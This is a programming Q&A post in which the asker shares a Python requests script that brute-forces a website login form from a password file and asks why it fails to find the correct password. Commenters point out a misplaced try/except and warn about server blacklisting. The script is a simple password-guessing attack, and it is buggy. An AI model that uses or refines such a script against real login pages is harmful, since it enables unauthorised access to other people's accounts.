# I failed a brute-force - Python requests

Tags: python, python-requests, ui-automation, brute-force

I have this python code that doesn't seem to work. My passwords.txt file contains three passwords; a wrong password, the correct password, and an incorrect password.

It doesn't seem to catch the correct password; is there another way I could catch it? Could the problem be somewhere else(not finding the text fields, for example)?

---

```
import requests
url = "http:website.login"
username = "username"
error = "Password Error"

try:
    def bruteCracking(username,url,error):
        for password in passwords:
            password = password.strip()
            print("Trying:" + password)
            data_dict = {"text": username,"password": password,"button":"btnEntrar"}         
            response = requests.post(url, data=data_dict)
            if error in str(response.content):
               pass
            elif "csrf" in str(response.content):
                 print("CSRF Token Detected!! BruteF0rce Not Working This Website.")
                 exit()
            else:
                 print("Username: ---> " + username)
                 print("Password: ---> " + password)
                 exit()
except:
       print("Some Error Occurred Please Check Your Internet Connection!")
        
with open("passwords.txt", "r") as passwords:
     bruteCracking(username,url,error)
```

`btnEntrar` is the name of the button, the object type is not `submit`, it is `button`

Comment: Did you try "manually" sending the request with the correct password and studying the response?

Comment: What exactly happens when you execute it? Is there an error? Or is there simply nothing happening? Btw, your try-except is useless there. You are checking, whether the definition of the method is succeeding which will always be okay. It should be inside the method.

Comment: Out of curiosity, what is the difference between `wrong password` and `incorrect password`?

Comment: defining `bruteCracking` will not generate an exeption, so the `try-except` is useless

Comment: Unless the website security is really really bad, bruteforcing a login like this will make the server blacklist your attempts, so your script will work for some iterations until the server rejects your requests.

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.